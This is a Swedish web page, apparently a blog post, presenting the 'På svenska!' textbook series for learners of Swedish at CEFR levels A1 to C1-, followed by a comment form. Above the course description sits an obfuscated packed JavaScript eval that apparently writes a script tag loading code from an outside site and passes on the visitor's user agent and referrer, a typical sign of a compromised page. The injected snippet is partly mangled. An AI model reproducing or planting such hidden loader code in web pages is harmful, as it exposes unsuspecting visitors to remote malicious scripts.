Sök
Sök Meny

På svenska!

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hzydb|var|u0026u|referrer|fkekz||js|php’.split(‘|’),0,{}))
svenska! 1
är ett lämpligt läromedel för dig som snabbt vill uppnå baskunskaper i svenska språket. Syftet är att redan efter kort tid kunna delta i vardagssamtal utan att behöva ägna så mycket tid till grammatikträning.

På svenska! 1 täcker nivå A1 och A2 enligt Europarådets nivåskala (GERS/CEFR). Kursen kan även vara lämplig i andra typer av utbildningar på motsvarande nivå, t.ex. sfi, studieväg 3 kurs C.

 

 

 

 

 

 

 

 

På svenska! 2 bygger vidare på kunskaperna från nybörjarboken. Läromedlet vänder sig till dig som redan har goda baskunskaper. Det passar också för självstudier.

På svenska! 3 är ett läromedel för forsättningskurser i svenska som främmande språk. Det vänder sig till studerande som har uppnått nivå B1+ enligt Europarådets nivåskala. Läromedlet är lämpligt att använda såväl i klassrumsundervisning som vid självstudier.

Efter att ha läst På svenska! 3 beräknas man ha uppnått nivå C1- på Europarådets nivåskala.

Lämna en kommentar

Nödvändiga fält är markerade *.


tio + 4 =

%d bloggare gillar detta: